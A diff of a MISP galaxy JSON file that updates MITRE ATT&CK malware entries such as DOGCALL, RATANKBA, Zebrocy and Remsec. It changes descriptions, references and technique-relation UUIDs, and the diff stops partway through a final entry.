@@ -11838,26 +13580,33 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "3d8e547d-9456-4f32-a895-dc86134e282f", "value": "Umbreon - S0221" }, { - "description": "[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [ScarCruft](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)", + "description": "[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)", "meta": { "external_id": "S0213", "mitre_platforms": [ @@ -11887,7 +13636,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -11899,6 +13648,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0852567d-7958-4f4b-8947-4f840ec8d57d", @@ -11981,8 +13751,7 @@ ], "refs": [ "https://attack.mitre.org/software/S0241", - "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ratankba-watering-holes-against-enterprises/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" ], "synonyms": [ "RATANKBA" 
@@ -11990,63 +13759,7 @@ }, "related": [ { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12059,6 +13772,13 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ 
@@ -12067,7 +13787,28 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12088,14 +13829,42 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -12106,7 +13875,7 @@ "value": "RATANKBA - S0241" }, { - "description": "[Happywork](https://attack.mitre.org/software/S0214) is a downloader used by [ScarCruft](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)", + "description": "[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)", "meta": { "external_id": "S0214", "mitre_platforms": [ @@ -12184,21 +13953,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12212,7 +13967,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -12226,14 +13981,28 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12267,14 +14036,14 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12295,21 +14064,7 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -12321,6 +14076,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "b96680d1-5eb3-4f07-b95c-00ab904ac236", @@ -12356,6 +14125,13 @@ ], "type": "uses" }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -12369,13 +14145,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322", @@ -12425,6 +14194,13 @@ ], "type": "uses" }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ @@ -12439,13 +14215,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ 
@@ -12497,104 +14266,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - 
"type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -12602,62 +14273,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ 
@@ -12665,6 +14280,34 @@ ], "type": "uses" }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ 
@@ -12673,7 +14316,91 @@ "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12687,7 +14414,49 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -12698,7 +14467,7 @@ "value": "Remsec - S0125" }, { - "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan used by [APT28](https://attack.mitre.org/groups/G0007). [Zebrocy](https://attack.mitre.org/software/S0251) was seen used in attacks in early 2018. [Zebrocy](https://attack.mitre.org/software/S0251) comes in several programming language variants, including C++, Delphi, and AutoIt. (Citation: Palo Alto Sofacy 06-2018)", + "description": "[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, and VB.NET. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)", "meta": { "external_id": "S0251", "mitre_platforms": [ @@ -12706,20 +14475,15 @@ ], "refs": [ "https://attack.mitre.org/software/S0251", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" ], "synonyms": [ "Zebrocy" ] }, "related": [ - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
@@ -12734,12 +14498,152 @@ ], "type": "uses" }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" 
+ }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a4f57468-fbd5-49e4-8476-52088220b92d", @@ -12832,14 +14736,14 @@ "type": "uses" }, { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -12853,14 +14757,14 @@ "type": "uses" }, { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12887,7 +14791,14 @@ }, "related": [ { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12901,28 +14812,14 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -12943,7 +14840,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -12954,7 +14858,7 @@ "value": "Catchamas - S0261" }, { - "description": "[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX) (Citation: Sofacy Komplex Trojan).", + "description": "[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).", "meta": { "external_id": "S0162", "mitre_platforms": [ @@ -13012,13 +14916,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -13027,7 +14924,7 @@ "type": "uses" }, { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -13047,6 +14944,13 @@ ], "type": "uses" }, + { + "dest-uuid": 